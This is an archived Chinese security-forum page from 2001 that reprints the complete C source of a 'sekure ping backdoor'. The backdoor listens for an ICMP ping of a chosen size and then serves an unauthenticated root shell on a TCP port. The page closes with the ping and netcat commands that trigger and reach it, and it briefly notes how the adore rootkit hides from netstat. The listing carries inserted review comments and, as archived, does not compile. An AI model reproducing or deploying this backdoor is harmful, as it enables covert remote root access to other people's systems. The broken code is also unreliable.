<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="321.htm">上一层</a>][<a href="459.htm">下一篇</a>]
<hr><p align="left"><small>---------------------------------------------------------------------------- <br>
---- <br>
scz 于 2001-3-16 9:27:08 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统安全 <br>
: <br>
adore比knark还糟糕些,而且对抗netstat的时候根本就是糊弄人(它似乎只按进程名netstat来过滤输出,换个文件名就不受影响)。如果 <br>
管理员怀疑有这个LLKM存在,应该把netstat复制成别的名字再运行: <br>
cp netstat mynetstat <br>
mynetstat -nap <br>
此外,这个ping backdoor的原始样子 <br>
/* <br>
* sekure ping backdoor for linux. (Sep 13, 1998) <br>
* <br>
* <br>
* usage: <br>
* ./ping-back packet_size port <br>
* <br>
* | `-> port to bind the shell. <br>
* `-> you'll use this number to start the shell. <br>
* <br>
* to start the shell: ping host -s packet_size <br>
* <br>
* <br>
* coded by jamez. e-mail: jamez@sekure.org <br>
* <br>
* http://www.sekure.org <br>
* <br>
*/ <br>
#include <signal.h> <br>
#include <netinet/ip.h> <br>
#include <netdb.h> <br>
int SIZEPACK, PORT; /* set once in main() from argv[1] / argv[2]: ICMP payload size that acts as the trigger, and the TCP port bind_shell() listens on */ <br>
/* SIGCHLD handler: collects one terminated child with wait(NULL), then <br>
 * installs itself again as the SIGCHLD handler. <br>
 * NOTE(review): sys/wait.h is not among the includes shown on this page, so <br>
 * wait() is implicitly declared here.
 */
void child_kill() <br>
{ <br>
wait(NULL); /* exit status is discarded */ <br>
signal(SIGCHLD, child_kill); /* presumably re-armed because some signal() implementations reset the handler on delivery */ <br>
} <br>
/* Detaches from the caller and serves an unauthenticated /bin/sh on TCP PORT. <br>
 * Steps visible below: set the real/effective uid and gid to 0, chdir to "/", <br>
 * bind a TCP socket on INADDR_ANY:PORT, fork twice around setpgrp(), then <br>
 * accept connections forever and attach each one to a shell's descriptors 0-2. <br>
 * Returns 1 only when execl() fails; every other exit path calls exit(). <br>
 * Defender's view: the artefacts are a TCP listener on every interface and a <br>
 * /bin/sh process whose stdin/stdout/stderr are one and the same TCP socket. <br>
 * NOTE(review): the braces of this function do not balance as archived (see <br>
 * the doubled "{" after while (1)), so the text does not compile as shown.
 */
int bind_shell() <br>
{ <br>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; <br>
struct sockaddr_in serv_addr; <br>
struct sockaddr_in client_addr; <br>
setuid(0); /* return values of the set*id() calls are never checked */ <br>
setgid(0); <br>
seteuid(0); <br>
setegid(0); <br>
setegid(0); /* repeated line; possibly a paging artefact of the forum archive */ <br>
chdir("/"); <br>
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); <br>
if (soc_des == -1) <br>
exit(-1); <br>
bzero((char *) &serv_addr,sizeof(serv_addr)); <br>
serv_addr.sin_family = AF_INET; <br>
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); /* listens on all local addresses */ <br>
serv_addr.sin_port = htons(PORT); <br>
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); <br>
<br>
if (soc_rc != 0) <br>
exit(-1); <br>
if (fork() != 0) /* first fork: the calling process exits, the child carries on */ <br>
exit(0); <br>
setpgrp(); /* leave the caller's process group */ <br>
if (fork() != 0) /* second fork: only the grandchild keeps the listening socket */ <br>
exit(0); <br>
soc_rc = listen(soc_des, 5); <br>
if (soc_rc != 0) <br>
exit(0); <br>
while (1) <br>
{ <br>
{ /* second opening brace with no matching close in the archived text */ <br>
soc_len = sizeof(client_addr); /* soc_len is an int; accept() is handed its address */ <br>
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); <br>
<br>
if (soc_cli < 0) <br>
exit(0); <br>
cli_pid = getpid(); /* assigned but never read in the visible code */ <br>
server_pid = fork(); <br>
if (server_pid != 0) /* true wherever fork() returned non-zero, which includes -1 on failure */ <br>
{ <br>
dup2(soc_cli,0); /* the connection becomes stdin, stdout and stderr */ <br>
dup2(soc_cli,1); <br>
dup2(soc_cli,2); <br>
execl("/bin/sh","sh",(char *)0); /* no credential check anywhere before the shell is started */ <br>
close(soc_cli); /* reached only if execl() failed */ <br>
return 1; <br>
} <br>
close(soc_cli); /* the process that got 0 from fork() drops the connection and accepts again */ <br>
} <br>
} <br>
/* Entry point: reads packet_size and port from argv, backgrounds itself, opens a <br>
 * raw ICMP socket and waits until a datagram of exactly SIZEPACK + 28 bytes is <br>
 * received; it then forks a child that runs bind_shell() and sleeps 15 seconds. <br>
 * The only condition tested is the datagram length: ICMP type, source address <br>
 * and payload are never examined. <br>
 * Defender's view: the waiting process holds a raw ICMP socket, and after a <br>
 * trigger a TCP listener appears on PORT; both are visible in a socket listing <br>
 * that shows owning processes, such as the netstat -nap run suggested on this page. <br>
 * NOTE(review): the "do" keyword appears twice in the archived text, so the <br>
 * listing does not compile as shown.
 */
int main(int argc, char *argv[]) <br>
{ <br>
int s, size, fromlen; <br>
char pkt[4096]; <br>
struct protoent *proto; <br>
struct sockaddr_in from; <br>
if(argc < 3) { <br>
printf("usage: %s packet_size port (jamez@sekure.org)\n", argv[0]); <br>
exit(0); <br>
} <br>
SIZEPACK = atoi(argv[1]); /* atoi() gives no error indication for non-numeric input */ <br>
PORT = atoi(argv[2]); <br>
strcpy(argv[0], (char *)strcat(argv[0], " ")); /* appends a space to argv[0] in place, then copies the string onto itself; presumably meant to change the name shown in process listings - TODO confirm */ <br>
<br>
signal(SIGHUP,SIG_IGN); /* keep running after the controlling terminal hangs up */ <br>
signal(SIGCHLD, child_kill); <br>
if (fork() != 0) exit(0); /* continue in the background child */ <br>
proto = getprotobyname("icmp"); /* result is dereferenced below without a NULL check */ <br>
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) <br>
/* can't creat raw socket */ <br>
exit(0); <br>
/* waiting for packets */ <br>
while(1) <br>
{ <br>
do <br>
do <br>
{ <br>
fromlen = sizeof(from); <br>
if ((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *) & <br>
from, & <br>
fromlen)) < 0) <br>
printf("ping of %i\n", size-28); /* as written, printed only when recvfrom() failed */ <br>
} while (size != SIZEPACK + 28); /* 28 is presumably the 20-byte IP header plus the 8-byte ICMP header - TODO confirm */ <br>
/* size == SIZEPACK, let's bind the shell */ <br>
switch(fork()) { <br>
case -1: <br>
continue; <br>
case 0: <br>
/* strcpy(argv[0], "-sekure working for your profit-"); */ <br>
bind_shell(); <br>
exit(0); <br>
} <br>
sleep(15); /* parent pauses before it reads the next datagram */ <br>
} <br>
} <br>
# backdoor 74 1524 <-- 这里必须是root身份启动,否则拒绝打开raw_socket <br>
如果用Linux的ping命令 <br>
# ping -s 74 <targetIp> <br>
# nc <targetIp> 1524 <br>
靠,简直是喂饭了。 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="321.htm">上一层</a>][<a href="459.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>